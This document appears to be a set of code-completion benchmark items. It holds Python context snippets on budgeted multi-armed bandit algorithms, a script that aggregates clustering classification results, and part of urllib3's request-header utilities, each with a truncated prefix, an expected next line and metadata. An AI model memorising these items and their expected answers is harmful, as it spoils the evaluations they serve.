7-9)\n criteria, mask = r_hat / b, np.zeros(self.N)\n arrange = np.argsort(criteria)[::-1]\n mask[arrange[:self.K]] = 1\n\n # Compute the payments for each selected arm (p^t_i) (Line 10)\n deno = r_hat[arrange[self.K]] # \\hat{r_i}_{K+1}(t-1)\n p = np.minimum(r_hat / deno * b[arrange[self.K]], StrategicArm.c_max) * mask\n\n # If the sum of payments exceeds the budget, terminate (Line 11)\n if np.sum(p) >= self.B:\n break\n\n # Update states with the new rewards obtained (Lines 13-14)\n omni = self.omniscience()\n self.r_bar = (self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N)) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n # Update total reward (R) (Line 14)\n self.R += np.sum(omni * mask)\n\n # Update budget (B) after payments (Line 14)\n self.B -= np.sum(p)\n\n # Return the total reward (R) and rounds (t) after the algorithm terminates.\n return self.R, self.t"
},
{
"identifier": "EpsilonFirst",
"path": "algorithms/eps.py",
"snippet": "class EpsilonFirst(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float, epsilon: float):\n super().__init__(arms, n_arms, n_selected, budget)\n self.eps = epsilon\n\n # average sampling/empirical rewards\n self.beta, self.r_bar = np.zeros(n_arms), np.zeros(n_arms)\n\n # placeholder\n self.budget_exploration = None\n self.budget_exploitation = None\n\n def initialize(self) -> None:\n self.budget_exploration = self.B * self.eps\n self.budget_exploitation = self.B - self.budget_exploration\n\n def run(self):\n # exploration\n while True:\n omni = self.omniscience()\n\n # select Phi randomly\n mask = np.zeros(self.N)\n mask[np.random.choice(np.arange(self.N), self.K)] = 1\n\n # payment p\n # FIXME p is not mentioned in this paper\n p = StrategicArm.c_max * mask\n\n # update t, R, B, r_bar, beta\n self.t += 1\n if self.B - sum(p) <= self.budget_exploitation:\n break\n\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n # exploitation\n b = np.array([arm.b for arm in self.arms])\n while True:\n omni = self.omniscience()\n\n # select Phi\n criteria, mask = self.r_bar / b, np.zeros(self.N)\n arrange = np.argsort(criteria)[::-1]\n mask[arrange[:self.K]] = 1\n\n # payment\n deno = self.r_bar[arrange[self.K]]\n p = np.minimum(self.r_bar / deno * b[arrange[self.K]], StrategicArm.c_max) * mask\n\n # update\n self.t += 1\n if np.sum(p) >= self.B:\n break\n\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n return self.R, self.t"
},
{
"identifier": "Opt",
"path": "algorithms/opt.py",
"snippet": "class Opt(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float):\n super().__init__(arms, n_arms, n_selected, budget)\n\n def initialize(self):\n \"\"\" sort N arms in descending order of p.p.r \"\"\"\n self.arms.sort(key=lambda arm: arm.mu / arm.b, reverse=True)\n\n def run(self):\n \"\"\" selects the top K arms according to r/b every round \"\"\"\n b = np.array([arm.b for arm in self.arms])\n\n while True:\n omni = self.omniscience()\n\n # select Phi\n mask = np.zeros(self.N)\n mask[:self.K] = 1\n\n # payment p\n p = b * mask\n\n # update t, R, B\n self.t += 1\n\n if np.sum(p) >= self.B:\n break\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n return self.R, self.t"
},
{
"identifier": "Separated",
"path": "algorithms/separated.py",
"snippet": "class Separated(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float):\n super().__init__(arms, n_arms, n_selected, budget)\n\n\n self.budget_exploration = 0.0\n self.budget_exploitation = 0.0\n\n # average sampling/empirical rewards\n self.beta, self.r_bar = np.zeros(n_arms), np.zeros(n_arms)\n\n def initialize(self) -> None:\n # B_1 in the paper\n self.budget_exploration = (StrategicArm.c_max * self.N * math.log(self.N * self.B)) ** (1 / 3) * self.B ** (\n 2 / 3) / 2 ** (1 / 3)\n\n self.budget_exploitation = self.B - self.budget_exploration\n\n def run(self):\n # exploration\n lo, hi = 0, self.K - 1\n while True:\n omni = self.omniscience()\n\n # select Phi\n mask = np.zeros(self.N)\n if lo < hi:\n mask[lo:hi + 1] = 1\n else:\n mask[:hi + 1] = 1\n mask[lo:] = 1\n\n lo = (lo + self.K) % self.N\n hi = (hi + self.K) % self.N\n\n # payment p\n p = StrategicArm.c_max * mask\n\n # update t, R, B, r_bar, beta\n self.t += 1\n if self.B - sum(p) <= self.budget_exploitation:\n break\n\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n # exploitation\n b = np.array([arm.b for arm in self.arms])\n while True:\n omni = self.omniscience()\n\n # select Phi\n u = np.sqrt(self.N * StrategicArm.c_max * np.log(self.N * self.B) / 2 * self.budget_exploration)\n r_tilde = self.r_bar + u\n\n criteria, mask = r_tilde / b, np.zeros(self.N)\n arrange = np.argsort(criteria)[::-1]\n mask[arrange[:self.K]] = 1\n\n # payment\n deno = r_tilde[arrange[self.K]]\n p = np.minimum(r_tilde / deno * b[arrange[self.K]], StrategicArm.c_max) * mask\n\n # update t, R, B, regardless of beta and r_bar\n self.t += 1\n if np.sum(p) >= self.B:\n break\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n return self.R, self.t"
},
{
"identifier": "StrategicArm",
"path": "arms.py",
"snippet": "class StrategicArm(NormalArm):\n c_min, c_max = 0.1, 1\n\n def __init__(self):\n # in the paper, r is expected reward\n r = random.uniform(0.1, 1)\n # to make that sample value is within 0~1 with 97%\n sigma = random.uniform(0, min(r / 3, (1 - r) / 3))\n super().__init__(r, sigma)\n\n # c for cost, b for bid, c_i = b_i according to the theorem 2\n self.c = random.uniform(0.1, 1)\n self.b = self.c"
}
] | from algorithms.aucb import AUCB
from algorithms.eps import EpsilonFirst
from algorithms.opt import Opt
from algorithms.separated import Separated
from arms import StrategicArm
import pickle | 3,027 | """
Author: DURUII
Date: 2023/12/17
Ref:
1. https://github.com/johnmyleswhite/BanditsBook/blob/master/python/testing_framework/tests.py
2. default simulation settings in the paper
"""
class Emulator:
algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']
def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):
self.N = n_arms
self.K = n_selected
self.B = budget
self.arms = arms
if arms is None:
self.arms = [StrategicArm() for _ in range(self.N)]
self.name2sol = {}
def build(self):
for algo in Emulator.algorithms:
if algo == 'AUCB':
self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)
elif algo == 'optimal':
| """
Author: DURUII
Date: 2023/12/17
Ref:
1. https://github.com/johnmyleswhite/BanditsBook/blob/master/python/testing_framework/tests.py
2. default simulation settings in the paper
"""
class Emulator:
algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']
def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):
self.N = n_arms
self.K = n_selected
self.B = budget
self.arms = arms
if arms is None:
self.arms = [StrategicArm() for _ in range(self.N)]
self.name2sol = {}
def build(self):
for algo in Emulator.algorithms:
if algo == 'AUCB':
self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)
elif algo == 'optimal': | self.name2sol[algo] = Opt(self.arms, self.N, self.K, self.B) | 2 | 2023-12-15 18:17:01+00:00 | 4k |
XLearning-SCU/2023-TPAMI-SMILE | _Utils/SummeryCla.py | [
{
"identifier": "DirectoryOperator",
"path": "_Utils/DirectoryOperator.py",
"snippet": "class DirectoryOperator:\r\n def __init__(self, directory: str):\r\n self.directory = directory\r\n\r\n def make_fold(self):\r\n if not TestMode:\r\n # print('mk dir {}'.format(os.path.dirname(self.directory)))\r\n os.makedirs(os.path.dirname(self.directory), exist_ok=True)\r\n\r\n def modification_time(self):\r\n if os.path.exists(self.directory):\r\n return os.path.getmtime(self.directory)\r\n else:\r\n warnings.warn('Time_now is returned since the modification time for non-exist file is not available. File: {}'.format(self.directory))\r\n return time.time()\r"
},
{
"identifier": "visualize_plot",
"path": "_Utils/Visualize.py",
"snippet": "def visualize_plot(x, y, labels=None, show=False, fig_path=None, xlim=None):\r\n # print('ploting')\r\n st = time.time()\r\n plt.figure(figsize=(20, 10))\r\n if labels is None:\r\n labels = ['line{:02d}'.format(i) for i in range(len(x))]\r\n if not show and fig_path is None:\r\n fig_path = '../_fig/fig.jpg'\r\n for xi, yi, label in zip(x, y, labels):\r\n plt.plot(xi, yi, label=label)\r\n plt.legend(prop={'size': 6})\r\n plt.grid()\r\n if xlim is not None:\r\n plt.xlim((0, 600))\r\n\r\n if fig_path is not None:\r\n DirectoryOperator.FoldOperator(directory=fig_path).make_fold()\r\n plt.savefig(fig_path)\r\n if show:\r\n plt.show()\r\n plt.close()\r\n print('{} lines plotted in {} seconds.'.format(len(x), time.time() - st))\r"
}
] | import os
import warnings
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from _Utils.DirectoryOperator import DirectoryOperator
from _Utils.Visualize import visualize_plot
| 1,672 |
# my_sota_dirs = my_sota_dirs_1027
my_sota_dirs = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1027_ClasGT2'
def get_results_by_dirs(dirs):
df = pd.DataFrame()
if isinstance(dirs, str):
dirs = [dirs]
for rt in np.sort(dirs):
for run_root, dirs, files in os.walk(rt):
if len(run_root) == 0:
continue
if run_root[0] == '/':
run_root = run_root[1:]
res_csv = os.path.join(run_root, 'log/res.csv')
if not os.path.exists(res_csv):
continue
print('handling {}'.format(res_csv))
rs = pd.read_csv(res_csv)
rs.loc[:, 'src'] = run_root
df = pd.concat([df, rs], ignore_index=True)
# df = df.fillna(0)
return df
def get_sota():
co = ['method', 'dataset', 'aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
data = [
['KCCA', 'NoisyMNIST30000', 1, 1, 97.20, 97.18, 97.08],
['MvCLN', 'NoisyMNIST30000', 0.5, 1, 96.19, 96.18, 96.15],
# ['SURE', 'NoisyMNIST30000', 0.5, 0, 93.01, 85.40, 85.92],
# ['SURE', 'NoisyMNIST30000', 0.5, 0.5, 85.04, 67.71, 69.62],
]
df = pd.DataFrame(data, columns=co)
df.loc[:, 'Name'] = ['{}'.format(m) for m in df.loc[:, 'method']]
# df.loc[:, 'Name'] = ['{:.1f}/{:.1f}/{}'.format(a, c, m) for a, c, m in zip(
# df.loc[:, 'aligned_prop'], df.loc[:, 'complete_prop'], df.loc[:, 'method'])]
df.set_index('Name', inplace=True)
return df
def plot():
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1025_BenchSotaCI22'
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1019_InCompelet'
# [print(rdir + '/' + it) for it in np.sort(os.listdir(rdir))]
df = get_results_by_dirs(my_sota_dirs)
sota = get_sota()
for wm in ['MNISTUSPS', 'NoisyMNIST30000', '2view-caltech101-8677sample', 'AWA-7view-10158sample',
'cub_googlenet_doc2vec_c10']:
df_draw = df.copy()
filter_dic = {'Epoch': 149, 'dataset': wm}
# filter_dic = {'Epoch': 149}
group_by_list = [
'dataset', 'batch_size',
'aligned_prop', 'complete_prop',
'CodeTest', 'reFill', 'reAlign', 'reAlignK',
]
for k, v in filter_dic.items():
df_draw = df_draw.loc[df_draw.loc[:, k] == v]
if len(group_by_list):
group_by_list2 = []
for gn in group_by_list:
it = df_draw.loc[:, gn]
if it.isna().sum():
it_na = it[- it.isna()]
if len(it_na):
ddt = it_na.iloc[0]
else:
ddt = 0
df_draw.loc[:, gn] = it.fillna(type(ddt)(0))
warnings.warn('Filling nan in {} with {}.'.format(gn, type(ddt)(0)))
if len(np.unique(it.dropna())) + (1 if it.isna().sum() else 0) > 1:
group_by_list2.append(gn)
group_by_list = group_by_list2
print(group_by_list)
dfgd = pd.concat(
[df_draw[df_draw.loc[:, 'Epoch'] == ep].groupby(group_by_list, as_index=False).mean() for
ep in np.unique(df_draw.loc[:, 'Epoch'].values)])
# dfgd[instance_name] = dfgd.index.values
df_draw = dfgd
show_keys = ['aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
df_draw = df_draw.loc[:, show_keys]
df_draw.loc[:, show_keys[2:]] *= 100
df_draw.loc[:, 'Name'] = 'IMvC'
df_draw.set_index('Name', inplace=True)
df_fusion = sota.loc[sota.loc[:, 'dataset'] == wm]
df_fusion = pd.concat([df_fusion.loc[:, show_keys], df_draw], ignore_index=False)
# df_fusion = df_draw
df_fusion.loc[:, show_keys[2:]] = np.round(df_fusion.loc[:, show_keys[2:]], 2)
df_fusion = df_fusion.sort_values(by=['aligned_prop', 'complete_prop'])
path = 'D:/VirtualMachine/CheckPoints/MultiClustering/Paper/Table1/Cla_{}.csv'.format(wm)
|
# my_sota_dirs = my_sota_dirs_1027
my_sota_dirs = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1027_ClasGT2'
def get_results_by_dirs(dirs):
df = pd.DataFrame()
if isinstance(dirs, str):
dirs = [dirs]
for rt in np.sort(dirs):
for run_root, dirs, files in os.walk(rt):
if len(run_root) == 0:
continue
if run_root[0] == '/':
run_root = run_root[1:]
res_csv = os.path.join(run_root, 'log/res.csv')
if not os.path.exists(res_csv):
continue
print('handling {}'.format(res_csv))
rs = pd.read_csv(res_csv)
rs.loc[:, 'src'] = run_root
df = pd.concat([df, rs], ignore_index=True)
# df = df.fillna(0)
return df
def get_sota():
co = ['method', 'dataset', 'aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
data = [
['KCCA', 'NoisyMNIST30000', 1, 1, 97.20, 97.18, 97.08],
['MvCLN', 'NoisyMNIST30000', 0.5, 1, 96.19, 96.18, 96.15],
# ['SURE', 'NoisyMNIST30000', 0.5, 0, 93.01, 85.40, 85.92],
# ['SURE', 'NoisyMNIST30000', 0.5, 0.5, 85.04, 67.71, 69.62],
]
df = pd.DataFrame(data, columns=co)
df.loc[:, 'Name'] = ['{}'.format(m) for m in df.loc[:, 'method']]
# df.loc[:, 'Name'] = ['{:.1f}/{:.1f}/{}'.format(a, c, m) for a, c, m in zip(
# df.loc[:, 'aligned_prop'], df.loc[:, 'complete_prop'], df.loc[:, 'method'])]
df.set_index('Name', inplace=True)
return df
def plot():
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1025_BenchSotaCI22'
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1019_InCompelet'
# [print(rdir + '/' + it) for it in np.sort(os.listdir(rdir))]
df = get_results_by_dirs(my_sota_dirs)
sota = get_sota()
for wm in ['MNISTUSPS', 'NoisyMNIST30000', '2view-caltech101-8677sample', 'AWA-7view-10158sample',
'cub_googlenet_doc2vec_c10']:
df_draw = df.copy()
filter_dic = {'Epoch': 149, 'dataset': wm}
# filter_dic = {'Epoch': 149}
group_by_list = [
'dataset', 'batch_size',
'aligned_prop', 'complete_prop',
'CodeTest', 'reFill', 'reAlign', 'reAlignK',
]
for k, v in filter_dic.items():
df_draw = df_draw.loc[df_draw.loc[:, k] == v]
if len(group_by_list):
group_by_list2 = []
for gn in group_by_list:
it = df_draw.loc[:, gn]
if it.isna().sum():
it_na = it[- it.isna()]
if len(it_na):
ddt = it_na.iloc[0]
else:
ddt = 0
df_draw.loc[:, gn] = it.fillna(type(ddt)(0))
warnings.warn('Filling nan in {} with {}.'.format(gn, type(ddt)(0)))
if len(np.unique(it.dropna())) + (1 if it.isna().sum() else 0) > 1:
group_by_list2.append(gn)
group_by_list = group_by_list2
print(group_by_list)
dfgd = pd.concat(
[df_draw[df_draw.loc[:, 'Epoch'] == ep].groupby(group_by_list, as_index=False).mean() for
ep in np.unique(df_draw.loc[:, 'Epoch'].values)])
# dfgd[instance_name] = dfgd.index.values
df_draw = dfgd
show_keys = ['aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
df_draw = df_draw.loc[:, show_keys]
df_draw.loc[:, show_keys[2:]] *= 100
df_draw.loc[:, 'Name'] = 'IMvC'
df_draw.set_index('Name', inplace=True)
df_fusion = sota.loc[sota.loc[:, 'dataset'] == wm]
df_fusion = pd.concat([df_fusion.loc[:, show_keys], df_draw], ignore_index=False)
# df_fusion = df_draw
df_fusion.loc[:, show_keys[2:]] = np.round(df_fusion.loc[:, show_keys[2:]], 2)
df_fusion = df_fusion.sort_values(by=['aligned_prop', 'complete_prop'])
path = 'D:/VirtualMachine/CheckPoints/MultiClustering/Paper/Table1/Cla_{}.csv'.format(wm)
| DirectoryOperator(path).make_fold()
| 0 | 2023-12-21 08:50:36+00:00 | 4k |
Liyulingyue/ModulelyTools | codes/extraction/ModuleTools.py | [
{
"identifier": "parse_ipynb",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def parse_ipynb(file_path):\n \"\"\"\n # 示例:使用函数解析一个ipynb文件\n file_path = 'main.ipynb' # 请将此处替换为您的ipynb文件路径\n result = parse_ipynb(file_path)\n print(result)\n \"\"\"\n # 读取ipynb文件\n with open(file_path, 'r', encoding='utf-8') as f:\n nb = nbformat.read(f, as_version=4)\n\n # 初始化结果列表\n parsed_cells = []\n\n # 对每一个cell进行处理\n for cell in nb.cells:\n cell_dict = {}\n if cell.cell_type == 'markdown':\n cell_dict['属性'] = 'Markdown'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n elif cell.cell_type == 'code':\n cell_dict['属性'] = 'Code'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n else:\n raise ValueError(f\"Unsupported cell type: {cell.cell_type}\")\n parsed_cells.append(cell_dict)\n return parsed_cells"
},
{
"identifier": "get_ipynb_content",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_ipynb_content(parsed_cells):\n ipynb_content = \"\"\n\n for i in range(len(parsed_cells)):\n if parsed_cells[i]['属性'] == \"Code\":\n ipynb_content += f\"[Cell No. {i}]\\n {parsed_cells[i]['内容']}\\n\\n\"\n\n return ipynb_content"
},
{
"identifier": "get_model_list",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_model_list(ipynb_content, llm):\n prompt = \\\nf\"\"\" \n我将给你一些NoteBook中的测试代码,请你阅读这些代码,并根据代码内容进行架构设计,使用json格式返回设计结果。\nNoteBook中的代码是{ipynb_content}\nJson返回的内容格式为:\n{str('{')}\n\"模块\":list[dict{str('{')}\"Name\":str, \"Type\":str, \"Introduction\":str{str('}')}]\n{str('}')}\n“模块”信息是一个list,每个元素是一个字典,包括了模块名称,模块类型(取值为\"class\"或\"function\"),模块介绍\n\"\"\"\n json_data = llm.get_llm_json_answer(prompt)\n return json_data[\"模块\"]"
},
{
"identifier": "model_list2python",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def model_list2python(model_list, ipynb_content, llm):\n py_str = \"\"\n for model_dict in model_list:\n model_name = model_dict[\"Name\"]\n model_type = model_dict[\"Type\"]\n model_intro = model_dict[\"Introduction\"]\n\n prompt = \\\nf\"\"\" \n我将给你一个模块名称和模块类型,以及一些Notebook中的测试代码,并根据代码内容实现这个模块,使用json格式返回设计结果。\n模块名称是{model_name},请定义为一个{model_type},模块的功能是{model_intro},NoteBook中的代码是{ipynb_content}。\nJson返回的内容格式为:\n{str('{')}\n\"代码\":multi-lines str\n{str('}')}\n“代码”信息是一个多行字符串,内容是你根据NoteBook中的代码和模块的功能,对模块{model_name}的程序实现,请保证生成的代码可以直接运行,解释说明的内容采用注释标记。\n\"\"\"\n\n # model_impl = get_llm_json_answer(prompt)\n try:\n model_impl = llm.get_llm_json_answer(prompt)\n py_str += model_impl[\"代码\"]\n except:\n py_str += f\"# 模块{model_name},类型是{model_type},生成失败\"\n py_str += \"\\n\\n\"\n return py_str"
},
{
"identifier": "extract_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def extract_function_defs(node, function_defs):\n if isinstance(node, ast.FunctionDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [arg.arg for arg in node.args.args], ast.get_docstring(node)])\n elif isinstance(node, ast.ClassDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [stmt.name for stmt in node.body if isinstance(stmt, ast.FunctionDef)], ast.get_docstring(node)])\n else:\n for child in ast.iter_child_nodes(node):\n extract_function_defs(child, function_defs)"
},
{
"identifier": "get_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_function_defs(code):\n tree = ast.parse(code)\n function_defs = []\n extract_function_defs(tree, function_defs)\n return function_defs # a list, each element is [define of function/class, docstring]"
},
{
"identifier": "get_intro_of_fun",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_intro_of_fun(fun_str, llm):\n try:\n prompt = f\"\"\"\n 请帮我为这个函数或者类写一段说明介绍,并且以json的形式返回给我。\n 需要解读的函数或者类是{fun_str}\n Json返回的内容格式为:\n {str('{')}\"\n \"说明介绍\":str\n {str('}')}\n \"\"\"\n result = llm.get_llm_answer(prompt)\n try:\n json_dict = llm.extract_json_from_llm_answer(result)\n return json_dict[\"说明介绍\"]\n except:\n return result\n except:\n return \"输出失败\""
}
] | from .ipynb.ipynb_analyse import parse_ipynb, get_ipynb_content, get_model_list, model_list2python
from .py.py_analyse import extract_function_defs, get_function_defs, get_intro_of_fun
from ..llm.Ernie import Ernie
from ..llm.Ernie import Ernie | 1,672 |
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
ipynb_content = get_ipynb_content(result)
model_list = get_model_list(ipynb_content, self.llm)
py_str = model_list2python(model_list, ipynb_content, self.llm)
return py_str
def py2md(self, py_path = "example.py", prompt = ""):
with open(py_path, encoding="utf8") as f:
py_str = f.read()
md_str = "# 函数使用说明文档"
|
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
ipynb_content = get_ipynb_content(result)
model_list = get_model_list(ipynb_content, self.llm)
py_str = model_list2python(model_list, ipynb_content, self.llm)
return py_str
def py2md(self, py_path = "example.py", prompt = ""):
with open(py_path, encoding="utf8") as f:
py_str = f.read()
md_str = "# 函数使用说明文档"
| function_defs = get_function_defs(py_str) | 5 | 2023-12-17 14:20:45+00:00 | 4k |
Azure-Samples/functions-python-web-crawler | .venv/Lib/site-packages/urllib3/util/request.py | [
{
"identifier": "UnrewindableBodyError",
"path": ".venv/Lib/site-packages/urllib3/exceptions.py",
"snippet": "class UnrewindableBodyError(HTTPError):\n \"\"\"urllib3 encountered an error when trying to rewind a body\"\"\""
},
{
"identifier": "to_bytes",
"path": ".venv/Lib/site-packages/urllib3/util/util.py",
"snippet": "def to_bytes(\n x: str | bytes, encoding: str | None = None, errors: str | None = None\n) -> bytes:\n if isinstance(x, bytes):\n return x\n elif not isinstance(x, str):\n raise TypeError(f\"not expecting type {type(x).__name__}\")\n if encoding or errors:\n return x.encode(encoding or \"utf-8\", errors=errors or \"strict\")\n return x.encode()"
}
] | import io
import typing
import brotlicffi as _unused_module_brotli # type: ignore[import] # noqa: F401
import brotli as _unused_module_brotli # type: ignore[import] # noqa: F401
import zstandard as _unused_module_zstd # type: ignore[import] # noqa: F401
from base64 import b64encode
from enum import Enum
from ..exceptions import UnrewindableBodyError
from .util import to_bytes
from typing import Final | 1,772 |
print(urllib3.util.make_headers(keep_alive=True, user_agent="Batman/1.0"))
# {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
print(urllib3.util.make_headers(accept_encoding=True))
# {'accept-encoding': 'gzip,deflate'}
"""
headers: dict[str, str] = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ",".join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers["accept-encoding"] = accept_encoding
if user_agent:
headers["user-agent"] = user_agent
if keep_alive:
headers["connection"] = "keep-alive"
if basic_auth:
headers[
"authorization"
] = f"Basic {b64encode(basic_auth.encode('latin-1')).decode()}"
if proxy_basic_auth:
headers[
"proxy-authorization"
] = f"Basic {b64encode(proxy_basic_auth.encode('latin-1')).decode()}"
if disable_cache:
headers["cache-control"] = "no-cache"
return headers
def set_file_position(
body: typing.Any, pos: _TYPE_BODY_POSITION | None
) -> _TYPE_BODY_POSITION | None:
"""
If a position is provided, move file to that point.
Otherwise, we'll attempt to record a position for future use.
"""
if pos is not None:
rewind_body(body, pos)
elif getattr(body, "tell", None) is not None:
try:
pos = body.tell()
except OSError:
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body.
pos = _FAILEDTELL
return pos
def rewind_body(body: typing.IO[typing.AnyStr], body_pos: _TYPE_BODY_POSITION) -> None:
"""
Attempt to rewind body to a certain position.
Primarily used for request redirects and retries.
:param body:
File-like object that supports seek.
:param int pos:
Position to seek to in file.
"""
body_seek = getattr(body, "seek", None)
if body_seek is not None and isinstance(body_pos, int):
try:
body_seek(body_pos)
except OSError as e:
raise UnrewindableBodyError(
"An error occurred when rewinding request body for redirect/retry."
) from e
elif body_pos is _FAILEDTELL:
raise UnrewindableBodyError(
"Unable to record file position for rewinding "
"request body during a redirect/retry."
)
else:
raise ValueError(
f"body_pos must be of type integer, instead it was {type(body_pos)}."
)
class ChunksAndContentLength(typing.NamedTuple):
chunks: typing.Iterable[bytes] | None
content_length: int | None
def body_to_chunks(
body: typing.Any | None, method: str, blocksize: int
) -> ChunksAndContentLength:
"""Takes the HTTP request method, body, and blocksize and
transforms them into an iterable of chunks to pass to
socket.sendall() and an optional 'Content-Length' header.
A 'Content-Length' of 'None' indicates the length of the body
can't be determined so should use 'Transfer-Encoding: chunked'
for framing instead.
"""
chunks: typing.Iterable[bytes] | None
content_length: int | None
# No body, we need to make a recommendation on 'Content-Length'
# based on whether that request method is expected to have
# a body or not.
if body is None:
chunks = None
if method.upper() not in _METHODS_NOT_EXPECTING_BODY:
content_length = 0
else:
content_length = None
# Bytes or strings become bytes
elif isinstance(body, (str, bytes)):
| from __future__ import annotations
if typing.TYPE_CHECKING:
# Pass as a value within ``headers`` to skip
# emitting some HTTP headers that are added automatically.
# The only headers that are supported are ``Accept-Encoding``,
# ``Host``, and ``User-Agent``.
SKIP_HEADER = "@@@SKIP_HEADER@@@"
SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])
ACCEPT_ENCODING = "gzip,deflate"
try:
try:
except ImportError:
except ImportError:
pass
else:
ACCEPT_ENCODING += ",br"
try:
except ImportError:
pass
else:
ACCEPT_ENCODING += ",zstd"
class _TYPE_FAILEDTELL(Enum):
token = 0
_FAILEDTELL: Final[_TYPE_FAILEDTELL] = _TYPE_FAILEDTELL.token
_TYPE_BODY_POSITION = typing.Union[int, _TYPE_FAILEDTELL]
# When sending a request with these methods we aren't expecting
# a body so don't need to set an explicit 'Content-Length: 0'
# The reason we do this in the negative instead of tracking methods
# which 'should' have a body is because unknown methods should be
# treated as if they were 'POST' which *does* expect a body.
_METHODS_NOT_EXPECTING_BODY = {"GET", "HEAD", "DELETE", "TRACE", "OPTIONS", "CONNECT"}
def make_headers(
keep_alive: bool | None = None,
accept_encoding: bool | list[str] | str | None = None,
user_agent: str | None = None,
basic_auth: str | None = None,
proxy_basic_auth: str | None = None,
disable_cache: bool | None = None,
) -> dict[str, str]:
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'. If either the ``brotli`` or
``brotlicffi`` package is installed 'gzip,deflate,br' is used instead.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example:
.. code-block:: python
import urllib3
print(urllib3.util.make_headers(keep_alive=True, user_agent="Batman/1.0"))
# {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
print(urllib3.util.make_headers(accept_encoding=True))
# {'accept-encoding': 'gzip,deflate'}
"""
headers: dict[str, str] = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ",".join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers["accept-encoding"] = accept_encoding
if user_agent:
headers["user-agent"] = user_agent
if keep_alive:
headers["connection"] = "keep-alive"
if basic_auth:
headers[
"authorization"
] = f"Basic {b64encode(basic_auth.encode('latin-1')).decode()}"
if proxy_basic_auth:
headers[
"proxy-authorization"
] = f"Basic {b64encode(proxy_basic_auth.encode('latin-1')).decode()}"
if disable_cache:
headers["cache-control"] = "no-cache"
return headers
def set_file_position(
body: typing.Any, pos: _TYPE_BODY_POSITION | None
) -> _TYPE_BODY_POSITION | None:
"""
If a position is provided, move file to that point.
